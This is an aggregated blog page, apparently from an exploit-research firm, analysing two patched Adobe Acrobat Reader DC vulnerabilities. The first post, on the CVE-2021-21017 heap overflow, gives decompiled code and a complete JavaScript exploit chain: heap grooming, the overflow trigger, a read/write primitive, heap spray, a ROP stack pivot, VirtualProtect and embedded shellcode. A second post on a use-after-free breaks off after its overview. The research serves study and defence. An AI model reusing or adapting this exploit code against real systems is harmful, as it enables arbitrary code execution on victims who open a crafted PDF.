RSS Security

🔒
❌ About FreshRSS
There are new articles available, click to refresh the page.
Before yesterdayExodus Intelligence

Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC

28 June 2021 at 10:46

By Sergi Martinez

This post analyzes and exploits CVE-2021-21017, a heap buffer overflow reported in Adobe Acrobat Reader DC prior to versions 2021.001.20135. This vulnerability was anonymously reported to Adobe and patched on February 9th, 2021. A publicly posted proof-of-concept containing root-cause analysis was used as a starting point for this research.

This post is similar to our previous post on Adobe Acrobat Reader, which exploits a use-after-free vulnerability that also occurs while processing Unicode and ANSI strings.

Overview

A heap buffer-overflow occurs in the concatenation of an ANSI-encoded string corresponding to a PDF document’s base URL. This occurs when an embedded JavaScript script calls functions located in the IA32.api module that deals with internet access, such as this.submitForm and app.launchURL. When these functions are called with a relative URL of a different encoding to the PDF’s base URL, the relative URL is treated as if it has the same encoding as the PDF’s path. This can result in the copying twice the number of bytes of the source ANSI string (relative URL) into a properly-sized destination buffer, leading to both an out-of-bounds read and a heap buffer overflow.

CVE-2021-21017

Acrobat Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

Internet access related operations are handled by the IA32.api module. The vulnerability occurs within this module when a URL is built by concatenating the PDF document’s base URL and a relative URL. This relative URL is specified as a parameter in a call to JavaScript functions that trigger any kind of Internet access such as this.submitForm and app.launchURL. In particular, the vulnerability occurs when the encoding of both strings differ.

The concatenation of both strings is done by allocating enough memory to fit the final string. The computation of the length of both strings is correctly done taking into account whether they are ANSI or Unicode. However, when the concatenation occurs only the base URL encoding is checked and the relative URL is considered to have the same encoding as the base URL. When the relative URL is ANSI encoded, the code that copies bytes from the relative URL string buffer into the allocated buffer copies it two bytes at a time instead of just one byte at a time. This leads to reading a number of bytes equal to the length of the relative URL from outside the source buffer and copying it beyond the bounds of the destination buffer by the same length, resulting in both an out-of-bounds read and an out-of-bounds write vulnerability.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference marks denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

All code listings show decompiled C code; source code is not available in the affected product. Structure definitions are obtained by reverse engineering and may not accurately reflect structures defined in the source code.

The following function is called when a relative URL needs to be concatenated to a base URL. Aside from the concatenation it also checks that both URLs are valid.

__int16 __cdecl sub_25817D70(wchar_t *Source, CHAR *lpString, char *String, _DWORD *a4, int *a5)
{
  __int16 v5; // di
  CHAR v6; // cl
  CHAR *v7; // ecx
  CHAR v8; // al
  CHAR v9; // dl
  CHAR *v10; // eax
  bool v11; // zf
  CHAR *v12; // eax

[Truncated]

  int iMaxLength; // [esp+D4h] [ebp-14h]
  LPCSTR v65; // [esp+D8h] [ebp-10h]
  int v66; // [esp+DCh] [ebp-Ch] BYREF
  LPCSTR v67; // [esp+E0h] [ebp-8h]
  wchar_t *v68; // [esp+E4h] [ebp-4h]

  v68 = 0;
  v65 = 0;
  v67 = 0;
  v38 = 0;
  v51 = 0;
  v63 = 0;
  v5 = 1;
  if ( !a5 )
    return 0;
  *a5 = 0;
  if ( lpString )
  {
    if ( *lpString )
    {
      v6 = lpString[1];
      if ( v6 )
      {

[1]

        if ( *lpString == (CHAR)0xFE && v6 == (CHAR)0xFF )
        {
          v7 = lpString;
          while ( 1 )
          {
            v8 = *v7;
            v9 = v7[1];
            v7 += 2;
            if ( !v8 )
              break;
            if ( !v9 || !v7 )
              goto LABEL_14;
          }
          if ( !v9 )
            goto LABEL_15;

[2]

LABEL_14:
          *a5 = -2;
          return 0;
        }
      }
    }
  }
LABEL_15:
  if ( !Source || !lpString || !String || !a4 )
  {
    *a5 = -2;
    goto LABEL_79;
  }

[3]

  iMaxLength = sub_25802A44((LPCSTR)Source) + 1;
  v10 = (CHAR *)sub_25802CD5(1, iMaxLength);
  v65 = v10;
  if ( !v10 )
  {
    *a5 = -7;
    return 0;
  }

[4]

  sub_25802D98((wchar_t *)v10, Source, iMaxLength);
  if ( *lpString != (CHAR)0xFE || (v11 = lpString[1] == -1, v67 = (LPCSTR)2, !v11) )
    v67 = (LPCSTR)1;

[5]

  v66 = (int)&v67[sub_25802A44(lpString)];
  v12 = (CHAR *)sub_25802CD5(1, v66);
  v67 = v12;
  if ( !v12 )
  {
    *a5 = -7;
LABEL_79:
    v5 = 0;
    goto LABEL_80;
  }

[6]

  sub_25802D98((wchar_t *)v12, (wchar_t *)lpString, v66);
  if ( !(unsigned __int16)sub_258033CD(v65, iMaxLength, a5) || !(unsigned __int16)sub_258033CD(v67, v66, a5) )
    goto LABEL_79;

[7]

  v13 = sub_25802400(v65, v31);
  if ( v13 || (v13 = sub_25802400(v67, v39)) != 0 )
  {
    *a5 = v13;
    goto LABEL_79;
  }

[Truncated]

[8]

  v23 = (wchar_t *)sub_25802CD5(1, v47 + 1 + v35);
  v68 = v23;
  if ( v23 )
  {
    if ( v35 )
    {

[9]

      sub_25802D98(v23, v36, v35 + 1);
      if ( *((_BYTE *)v23 + v35 - 1) != 47 )
      {
        v25 = sub_25818CE4(v24, (char *)v23, 47);
        if ( v25 )
          *(_BYTE *)(v25 + 1) = 0;
        else
          *(_BYTE *)v23 = 0;
      }
    }
    if ( v47 )
    {

[10]

      v26 = sub_25802A44((LPCSTR)v23);
      sub_25818BE0((char *)v23, v48, v47 + 1 + v26);
    }
    sub_25802E0C(v23, 0);
    v60 = sub_25802A44((LPCSTR)v23);
    v61 = v23;
    goto LABEL_69;
  }
  v5 = 0;
  *a4 = v47 + v35 + 1;
  *a5 = -3;
LABEL_81:
  if ( v65 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v65);
  if ( v67 )
    (*(void (__cdecl **)(LPCSTR))(dword_25824088 + 12))(v67);
  if ( v23 )
    (*(void (__cdecl **)(wchar_t *))(dword_25824088 + 12))(v23);
  return v5;
}

The function listed above receives as parameters a string corresponding to a base URL and a string corresponding to a relative URL, as well as two pointers used to return data to the caller. The two string parameters are shown in the following debugger output.

IA32!PlugInMain+0x168b0:
605a7d70 55              push    ebp
0:000> dd poi(esp+4) L84
099a35f0  0068fffe 00740074 00730070 002f003a
099a3600  0067002f 006f006f 006c0067 002e0065
099a3610  006f0063 002f006d 41414141 41414141
099a3620  41414141 41414141 41414141 41414141
099a3630  41414141 41414141 41414141 41414141

[Truncated]

099a37c0  41414141 41414141 41414141 41414141
099a37d0  41414141 41414141 41414141 41414141
099a37e0  41414141 41414141 41414141 2f2f3a41
099a37f0  00000000 00680074 00730069 006f002e
0:000> du poi(esp+4)
099a35f0  ".https://google.com/䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3630  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3670  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a36f0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3730  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a3770  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁"
099a37b0  "䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁䅁㩁."
099a37f0  ""
0:000> dd poi(esp+8)
0b2d30b0  61616262 61616161 61616161 61616161
0b2d30c0  61616161 61616161 61616161 61616161
0b2d30d0  61616161 61616161 61616161 61616161
0b2d30e0  61616161 61616161 61616161 61616161

[Truncated]

0b2d5480  61616161 61616161 61616161 61616161
0b2d5490  61616161 61616161 61616161 61616161
0b2d54a0  61616161 61616161 61616161 00616161
0b2d54b0  4d21fcdc 80000900 41409090 ffff4041
0:000> da poi(esp+8)
0b2d30b0  "bbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30d0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d30f0  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d3110  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

[Truncated]

0b2d5430  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5450  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5470  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
0b2d5490  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"

The debugger output shown above corresponds to an execution of the exploit. It shows the contents of the first and second parameters (esp+4 and esp+8) of the function sub_25817D70. The first parameter contains a Unicode-encoded base URL https://google.com/ (notice the 0xfeff bytes at the start of the string), while the second parameter contains an ASCII string corresponding to the relative URL. Both contain a number of repeated bytes that serve as padding to control the allocation size needed to hold them, which is useful for exploitation.

At [1] a check is made to ascertain whether the second parameter is a valid Unicode string. If an anomaly is found the function returns at [2]. The function sub_25802A44 at [3] computes the length of the string provided as a parameter, regardless of its encoding. The function sub_25802CD5 is an implementation of calloc which allocates an array with the amount of elements provided as the first parameter with size specified as the second parameter. The function sub_25802D98 at [4] copies a number of bytes of the string specified in the second parameter to the buffer pointed by the first parameter. Its third parameter specified the number of bytes to be copied. Therefore, at [3] and [4] the length of the base URL is computed, a new allocation of that size plus one is performed, and the base URL string is copied into the new allocation. In an analogous manner, the same operations are performed on the relative URL at [5] and [6].

The function sub_25802400, called at [7], receives a URL or a part of it and performs some validation and processing. This function is called on both base and relative URLs.

At [8] an allocation of the size required to host the concatenation of the relative URL and the base URL is performed. The lengths provided are calculated in the function called at [7]. For the sake of simplicity it is illustrated with an example: the following debugger output shows the value of the parameters to sub_25802CD5 that correspond to the number of elements to be allocated, and the size of each element. In this case the size is the addition of the length of the base and relative URLs.

eax=00002600 ebx=00000000 ecx=00002400 edx=00000000 esi=010fd228 edi=00000001
eip=61912cd5 esp=010fd0e4 ebp=010fd1dc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
IA32!PlugInMain+0x1815:
61912cd5 55              push    ebp
0:000> dd esp+4 L1
010fd0e8  00000001
0:000> dd esp+8 L1
010fd0ec  00002600

Continuing with the function previously listed, at [9] the base URL is copied into the memory allocated to host the concatenation and at [10] its length is calculated and provided as a parameter to the call to sub_25818BE0. This function implements string concatenation for both Unicode and ANSI strings. The call to this function at [10] provides the base URL as the first parameter, the relative URL as the second parameter and the expected full size of the concatenation as the third. This function is listed below.

int __cdecl sub_25818BE0(char *Destination, char *Source, int a3)
{
  int result; // eax
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !Destination || !Source || !a3 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[11]

  pExceptionObject = sub_25802A44(Destination);
  if ( pExceptionObject + sub_25802A44(Source) <= (unsigned int)(a3 - 1) )
  {

[12]

    sub_2581894C(Destination, Source);
    result = 1;
  }
  else
  {

[13]

    strncat(Destination, Source, a3 - pExceptionObject - 1);
    result = 0;
    Destination[a3 - 1] = 0;
  }
  return result;
}

In the above listing, at [11] the length of the destination string is calculated. It then checks if the length of the destination string plus the length of the source string is less or equal than the desired concatenation length minus one. If the check passes, the function sub_2581894C is called at [12]. Otherwise the strncat function at [13] is called.

The function sub_2581894C called at [12] implements the actual string concatenation that works for both Unicode and ANSI strings.

LPSTR __cdecl sub_2581894C(LPSTR lpString1, LPCSTR lpString2)
{
  int v3; // eax
  LPCSTR v4; // edx
  CHAR *v5; // ecx
  CHAR v6; // al
  CHAR v7; // bl
  int pExceptionObject; // [esp+10h] [ebp-4h] BYREF

  if ( !lpString1 || !lpString2 )
  {
    (*(void (__thiscall **)(_DWORD, int))(dword_258240AC + 4))(*(_DWORD *)(dword_258240AC + 4), 1073741827);
    pExceptionObject = 0;
    CxxThrowException(&pExceptionObject, (_ThrowInfo *)&_TI1H);
  }

[14]

  if ( *lpString1 == (CHAR)0xFE && lpString1[1] == (CHAR)0xFF )
  {

[15]

    v3 = sub_25802A44(lpString1);
    v4 = lpString2 + 2;
    v5 = &lpString1[v3];
    do
    {
      do
      {
        v6 = *v4;
        v4 += 2;
        *v5 = v6;
        v5 += 2;
        v7 = *(v4 - 1);
        *(v5 - 1) = v7;
      }
      while ( v6 );
    }
    while ( v7 );
  }
  else
  {

[16]

    lstrcatA(lpString1, lpString2);
  }
  return lpString1;
}

In the function listed above, at [14] the first parameter (the destination) is checked for the Unicode BOM marker 0xFEFF. If the destination string is Unicode the code proceeds to [15]. There, the source string is appended at the end of the destination string two bytes at a time. If the destination string is ANSI, then the known lstrcatA function is called.

It becomes clear that in the event that the destination string is Unicode and the source string is ANSI, for each character of the ANSI string two bytes are actually copied. This causes an out-of-bounds read of the size of the ANSI string that becomes a heap buffer overflow of the same size once the bytes are copied.

Exploitation

We’ll now walk through how this vulnerability can be exploited to achieve arbitrary code execution. 

Adobe Acrobat Reader DC version 2020.013.20074 running on Windows 10 x64 was used to develop the exploit. Note that Adobe Acrobat Reader DC is a 32-bit application. A successful exploit strategy needs to bypass the following security mitigations on the target:

  • Address Space Layout Randomization (ASLR)
  • Data Execution Prevention (DEP)
  • Control Flow Guard (CFG)
  • Sandbox Bypass

The exploit does not bypass the following protection mechanisms:

  • Adobe Sandbox protection: Sandbox protection must be disabled in Adobe Reader for this exploit to work. This may be done from Adobe Reader user interface by unchecking the Enable Protected Mode at Startup option found in Preferences -> Security (Enhanced)
  • Control Flow Guard (CFG): CFG must be disabled in the Windows machine for this exploit to work. This may be done from the Exploit Protection settings of Windows 10, setting the Control Flow Guard (CFG) option to Off by default.

In order to exploit this vulnerability bypassing ASLR and DEP, the following strategy is adopted:

  1. Prepare the heap layout to allow controlling the memory areas adjacent to the allocations made for the base URL and the relative URL. This involves performing enough allocations to activate the Low Fragmentation Heap bucket for the two sizes, and enough allocations to entirely fit a UserBlock. The allocations with the same size as the base URL allocation must contain an ArrayBuffer object, while the allocations with the same size as the relative URL must have the data required to overwrite the byteLength field of one of those ArrayBuffer objects with the value 0xffff.
  2. Poke some holes on the UserBlock by nullifying the reference to some of the recently allocated memory chunks.
  3. Trigger the garbage collector to free the memory chunks referenced by the nullified objects. This provides room for the base URL and relative URL allocations.
  4. Trigger the heap buffer overflow vulnerability, so the data in the memory chunk adjacent to the relative URL will be copied to the memory chunk adjacent to the base URL.
  5. If everything worked, step 4 should have overwritten the byteLength of one of the controlled ArrayBuffer objects. When a DataView object is created on the corrupted ArrayBuffer it is possible to read and write memory beyond the underlying allocation. This provides a precise way of overwriting the byteLength of the next ArrayBuffer with the value 0xffffffff. Creating a DataView object on this last ArrayBuffer allows reading and writing memory arbitrarily, but relative to where the ArrayBuffer is.
  6. Using the R/W primitive built, walk the NT Heap structure to identify the BusyBitmap.Buffer pointer. This allows knowing the absolute address of the corrupted ArrayBuffer and build an arbitrary read and write primitive that allows reading from and writing to absolute addresses.
  7. To bypass DEP it is required to pivot the stack to a controlled memory area. This is done by using a ROP gadget that writes a fixed value to the ESP register.
  8. Spray the heap with ArrayBuffer objects with the correct size so they are adjacent to each other. This should place a controlled allocation at the address pointed by the stack-pivoting ROP gadget.
  9. Use the arbitrary read and write to write shellcode in a controlled memory area, and to write the ROP chain to execute VirtualProtect to enable execution permissions on the memory area where the shellcode was written.
  10. Overwrite a function pointer of the DataView object used in the read and write primitive and trigger its call to hijack the execution flow.

The following sub-sections break down the exploit code with explanations for better understanding.

Preparing the Heap Layout

The size of the strings involved in this vulnerability can be controlled. This is convenient since it allows selecting the right size for each of them so they are handled by the Low Fragmentation Heap. The inner workings of the Low Fragmentation Heap (LFH) can be leveraged to increase the determinism of the memory layout required to exploit this vulnerability. Selecting a size that is not used in the program allows full control to activate the LFH bucket corresponding to it, and perform the exact number of allocations required to fit one UserBlock.

The memory chunks within a UserBlock are returned to the user randomly when an allocation is performed. The ideal layout required to exploit this vulnerability is having free chunks adjacent to controlled chunks, so when the strings required to trigger the vulnerability are allocated they fall in one of those free chunks.

In order to set up such a layout, 0xd+0x11 ArrayBuffers of size 0x2608-0x10-0x8 are allocated. The first 0x11 allocations are used to enable the LFH bucket, and the next 0xd allocations are used to fill a UserBlock (note that the number of chunks in the first UserBlock for that bucket size is not always 0xd, so this technique is not 100% effective). The ArrayBuffer size is selected so the underlying allocation is of size 0x2608 (including the chunk metadata), which corresponds to an LFH bucket not used by the application.

Then, the same procedure is done but allocating strings whose underlying allocation size is 0x2408, instead of allocating ArrayBuffers. The number of allocations to fit a UserBlock for this size can be 0xe.

The strings should contain the bytes required to overwrite the byteLength property of the ArrayBuffer that is corrupted once the vulnerability is triggered. The value that will overwrite the byteLength property is 0xffff. This does not allow leveraging the ArrayBuffer to read and write to the whole range of memory addresses in the process. Also, it is not possible to directly overwrite the byteLength with the value 0xffffffff since it would require overwriting the pointer of its DataView object with a non-zero value, which would corrupt it and break its functionality. Instead, writing only 0xffff allows avoiding overwriting the DataView object pointer, keeping its functionality intact since the leftmost two null bytes would be considered the Unicode string terminator during the concatenation operation.

function massageHeap() {

[1]

    var arrayBuffers = new Array(0xd+0x11);
    for (var i = 0; i < arrayBuffers.length; i++) {
        arrayBuffers[i] = new ArrayBuffer(0x2608-0x10-0x8);
        var dv = new DataView(arrayBuffers[i]);
    }

[2]

    var holeDistance = (arrayBuffers.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= arrayBuffers.length; i += holeDistance) {
        arrayBuffers[i] = null;
    }


[3]

    var strings = new Array(0xe+0x11);
    var str = unescape('%u9090%u4140%u4041%uFFFF%u0000') + unescape('%0000%u0000') + unescape('%u9090%u9090').repeat(0x2408);
    for (var i = 0; i < strings.length; i++) {
        strings[i] = str.substring(0, (0x2408-0x8)/2 - 2).toUpperCase();
    }


[4]

    var holeDistance = (strings.length-0x11) / 2 - 1;
    for (var i = 0x11; i <= strings.length; i += holeDistance) {
        strings[i] = null;
    }

    return arrayBuffers;
}

In the listing above, the ArrayBuffer allocations are created in [1]. Then in [2] two pointers to the created allocations are nullified in order to attempt to create free chunks surrounded by controlled chunks.

At [3] and [4] the same steps are done with the allocated strings.

Triggering the Vulnerability

Triggering the vulnerability is as easy as calling the app.launchURL JavaScript function. Internally, the relative URL provided as a parameter is concatenated to the base URL defined in the PDF document catalog, thus executing the vulnerable function explained in the *Code Analysis* section of this document.

function triggerHeapOverflow() {
    try {
        app.launchURL('bb' + 'a'.repeat(0x2608 - 2 - 0x200 - 1 -0x8));
    } catch(err) {}
}

The size of the allocation holding the relative URL string must be the same as the one used when preparing the heap layout so it occupies one of the freed spots, and ideally having a controlled allocation adjacent to it.

Obtaining an Arbitrary Read / Write Primitive

When the proper heap layout is successfully achieved and the vulnerability has been triggered, an ArrayBuffer byteLength property would be corrupted with the value 0xffff. This allows writing past the boundaries of the underlying memory allocation and overwriting the byteLength property of the next ArrayBuffer. Finally, creating a DataView object on this last corrupted buffer allows to read and write to the whole memory address range of the process in a relative manner.

In order to be able to read from and write to absolute addresses the memory address of the corrupted ArrayBuffer must be obtained. One way of doing it is to leverage the NT Heap metadata structures to leak a pointer to the same structure. It is relevant that the chunk header contains the chunk number and that all the chunks in a UserBlock are consecutive and adjacent. In addition, the size of the chunks are known, so it is possible to compute the distance from the origin of the relative read and write primitive to the pointer to leak. In an analogous manner, since the distance is known, once the pointer is leaked the distance can be subtracted from it to obtain the address of the origin of the read and write primitive.

The following function implements the process described in this subsection.

function getArbitraryRW(arrayBuffers) {

[1]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == 0xffff) {
            var dv = new DataView(arrayBuffers[i]);
            dv.setUint32(0x25f0+0xc, 0xffffffff, true);
        }
    }

[2]

    for (var i = 0; i < arrayBuffers.length; i++) {
        if (arrayBuffers[i] != null && arrayBuffers[i].byteLength == -1) {
            var rw = new DataView(arrayBuffers[i]);
            corruptedBuffer = arrayBuffers[i];
        }
    }

[3]

    if (rw) {
        var chunkNumber = rw.getUint8(0xffffffff+0x1-0x13, true);
        var chunkSize = 0x25f0+0x10+8;

        var distanceToBitmapBuffer = (chunkSize * chunkNumber) + 0x18 + 8;
        var bitmapBufferPtr = rw.getUint32(0xffffffff+0x1-distanceToBitmapBuffer, true);

        startAddr = bitmapBufferPtr + distanceToBitmapBuffer-4;
        return rw;
    }
    return rw;
}

The function above at [1] tries to locate the initial corrupted ArrayBuffer and leverages it to corrupt the adjacent ArrayBuffer. At [2] it tries to locate the recently corrupted ArrayBuffer and build the relative arbitrary read and write primitive by creating a DataView object on it. Finally, at [3] the aforementioned method of obtaining the absolute address of the origin of the relative read and write primitive is implemented.

Once the origin address of the read and write primitive is known it is possible to use the following helper functions to read and write to any address of the process that has mapped memory.

function readUint32(dataView, absoluteAddress) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    return dataView.getUint32(addrOffset, true);
}

function writeUint32(dataView, absoluteAddress, data) {
    var addrOffset = absoluteAddress - startAddr;
    if (addrOffset < 0) {
        addrOffset = addrOffset + 0xffffffff + 1;
    }
    dataView.setUint32(addrOffset, data, true);
}

Spraying ArrayBuffer Objects

The heap spray technique performs a large number of controlled allocations with the intention of having adjacent regions of controllable memory. The key to obtaining adjacent memory regions is to make the allocations of a specific size.

In JavaScript, a convenient way of making allocations in the heap whose content is completely controlled is by using ArrayBuffer objects. The memory allocated with these objects can be read from and written to with the use of DataView objects.

In order to get the heap allocation of the right size the metadata of ArrayBuffer objects and heap chunks have to be taken into consideration. The internal representation of ArrayBuffer objects tells that the size of the metadata is 0x10 bytes. The size of the metadata of a busy heap chunk is 8 bytes.

Since the objective is to have adjacent memory regions filled with controlled data, the allocations performed must have the exact same size as the heap segment size, which is 0x10000 bytes. Therefore, the ArrayBuffer objects created during the heap spray must be of 0xffe8 bytes.

function sprayHeap() {
    var heapSegmentSize = 0x10000;

[1]

    heapSpray = new Array(0x8000);
    for (var i = 0; i < 0x8000; i++) {
        heapSpray[i] = new ArrayBuffer(heapSegmentSize-0x10-0x8);
        var tmpDv = new DataView(heapSpray[i]);
        tmpDv.setUint32(0, 0xdeadbabe, true);
    }
}

The exploit function listed above performs the ArrayBuffer spray. The total size of the spray defined in [1] was determined by setting a number high enough so an ArrayBuffer would be allocated at the selected predictable address defined by the stack pivot ROP gadget used.

These purpose of these allocations is to have a controllable memory region at the address were the stack is relocated after the execution of the stack pivoting. This area can be used to prepare the call to VirtualProtect to enable execution permissions on the memory page were the shellcode is written.

Hijacking the Execution Flow and Executing Arbitrary Code

With the ability to arbitrarily read and write memory, the next steps are preparing the shellcode, writing it, and executing it. The security mitigations present in the application determine the strategy and techniques required. ASLR and DEP force using Return Oriented Programming (ROP) combined with leaked pointers to the relevant modules.

Taking this into account, the strategy can be the following:

  1. Obtain pointers to the relevant modules to calculate their base addresses.
  2. Pivot the stack to a memory region under our control where the addresses of the ROP gadgets can be written.
  3. Write the shellcode.
  4. Call VirtualProtect to change the shellcode memory region permissions to allow  execution.
  5. Overwrite a function pointer that can be called later from JavaScript.

The following functions are used in the implementation of the mentioned strategy.

[1]

function getAddressLeaks(rw) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var escriptAddrDelta = 0x275518;
    var escriptAddr = readUint32(rw, dataViewObjPtr+0xc) - escriptAddrDelta;

    var kernel32BaseDelta = 0x273eb8;
    var kernel32Addr = readUint32(rw, escriptAddr + kernel32BaseDelta);

    return [escriptAddr, kernel32Addr];
}
 
[2]

function prepareNewStack(kernel32Addr) {

    var virtualProtectStubDelta = 0x20420;
    writeUint32(rw, newStackAddr, kernel32Addr + virtualProtectStubDelta);

    var shellcode = [0x0082e8fc, 0x89600000, 0x64c031e5, 0x8b30508b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0x3cacff31,
        0x2c027c61, 0x0dcfc120, 0xf2e2c701, 0x528b5752, 0x3c4a8b10, 0x78114c8b, 0xd10148e3, 0x20598b51,
        0x498bd301, 0x493ae318, 0x018b348b, 0xacff31d6, 0x010dcfc1, 0x75e038c7, 0xf87d03f6, 0x75247d3b,
        0x588b58e4, 0x66d30124, 0x8b4b0c8b, 0xd3011c58, 0x018b048b, 0x244489d0, 0x615b5b24, 0xff515a59,
        0x5a5f5fe0, 0x8deb128b, 0x8d016a5d, 0x0000b285, 0x31685000, 0xff876f8b, 0xb5f0bbd5, 0xa66856a2,
        0xff9dbd95, 0x7c063cd5, 0xe0fb800a, 0x47bb0575, 0x6a6f7213, 0xd5ff5300, 0x636c6163, 0x6578652e,
        0x00000000]


[3]

    var shellcode_size = shellcode.length * 4;
    writeUint32(rw, newStackAddr + 4 , startAddr);
    writeUint32(rw, newStackAddr + 8, startAddr);
    writeUint32(rw, newStackAddr + 0xc, shellcode_size);
    writeUint32(rw, newStackAddr + 0x10, 0x40);
    writeUint32(rw, newStackAddr + 0x14, startAddr + shellcode_size);

[4]

    for (var i = 0; i < shellcode.length; i++) {
        writeUint32(rw, startAddr+i*4, shellcode[i]);
    }

}

function hijackEIP(rw, escriptAddr) {
    var dataViewObjPtr = rw.getUint32(0xffffffff+0x1-0x8, true);

    var dvShape = readUint32(rw, dataViewObjPtr);
    var dvShapeBase = readUint32(rw, dvShape);
    var dvShapeBaseClasp = readUint32(rw, dvShapeBase);

    var stackPivotGadgetAddr = 0x2de29 + escriptAddr;

    writeUint32(rw, dvShapeBaseClasp+0x10, stackPivotGadgetAddr);

    var foo = rw.execFlowHijack;
}

In the code listing above, the function at [1] obtains the base addresses of the EScript.api and kernel32.dll modules, which are the ones required to exploit the vulnerability with the current strategy. The function at [2] is used to prepare the contents of the relocated stack, so that once the stack pivot is executed everything is ready. In particular, at [3] the address to the shellcode and the parameters to VirtualProtect are written. The address to the shellcode corresponds to the return address that the ret instruction of the VirtualProtect will restore, redirecting this way the execution flow to the shellcode. The shellcode is written at [4].

Finally, at [5] the getProperty function pointer of a DataView object under control is overwritten with the address of the ROP gadget used to pivot the stack, and a property of the object is accessed which triggers the execution of getProperty.

The stack pivot gadget used is from the EScript.api module, and is listed below:

0x2382de29: mov esp, 0x5d0013c2; ret;

When the instructions listed above are executed, the stack will be relocated to 0x5d0013c2 where the previously prepared allocation would be.

Conclusion

We hope you enjoyed reading this analysis of a heap buffer-overflow and learned something new. If you’re hungry for more, go and checkout our other blog posts!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Adobe Acrobat Reader DC appeared first on Exodus Intelligence.

Analysis of a use-after-free Vulnerability in Adobe Acrobat Reader DC

20 April 2021 at 17:11

By Sergi Martinez

This post analyses CVE-2020-9715, a use-after-free vulnerability affecting several versions of the Adobe Acrobat and Adobe Acrobat Reader products. The vulnerability was discovered by Mark Vincent Yason, who reported it to the Zero Day Initiative (ZDI) disclosure program.

This research was inspired by a detailed blog post by ZDI that analyzed the vulnerability. The exploitation broadly follows the steps outlined in the ZDI blog post, but describes the vulnerability and exploitation steps in more detail.

Overview

A use-after-free vulnerability affects the data ESObject cache within the EScript.api module of Adobe Acrobat Reader DC. Although objects may be added to the cache using keys with ANSI or Unicode strings, objects are evicted from the cache by keys that contain only Unicode strings. This enables an attacker to cause a data ESObject to be freed, but its pointer to remain intact in the object cache entry. When the same JavaScript object is later accessed, its cache entry is found despite the corresponding data ESObject having been freed. This leads to a use-after-free condition. An attacker can exploit this vulnerability to achieve code execution by enticing a user to open a crafted PDF file.

The vulnerability analysis that follows is based on Adobe Acrobat Reader DC version 2020.009.20063 running on Windows 10 64-bit.

CVE-2020-9715

Before we dive into the vulnerability, we need to understand how embedded JavaScript is handled by Adobe Reader.

Adobe Reader has a built-in JavaScript engine based on Mozilla’s SpiderMonkey. Embedded JavaScript code in PDF files is processed and executed by the EScript.api module in Adobe Reader.

The Adobe Reader JavaScript engine uses several types of objects including ESObjects and JSObjects. ESObjects are internal to the EScript.api module and contain a pointer to the classical JavaScript objects, JSObjects.

Several kinds of ESObjects exist and among them is the data ESObject, which is a type of object used to represent embedded files and data streams. data ESObjects are uniquely identified by a key (referred to as cache_key in this post) that contains:

  • A pointer to a PDDoc object, which is an object that represents the PDF document.
  • The name of the data ESObject that is an ANSI or Unicode string containing the name of the embedded file.

References to data ESObjects are stored in a cache indexed by cache_key. When a new data ESObject is constructed with a certain name, a cache_key object is constructed with that name and is used to search the cache for the presence of the data ESObject that matches the name. If the search is a cache hit, a pointer to the data ESObject is returned. Otherwise, a new data ESObject is created and stored in the cache, and a pointer to it is returned.

The vulnerability occurs due to a mismatch in the encoding of the name string during the construction of cache_key used in the insertion and deletion phases in the lifecycle of a data ESObject. When a data ESObject is created and added to the cache, the name used in the cache_key retains the original encoding (ANSI or Unicode) found in the PDF document.

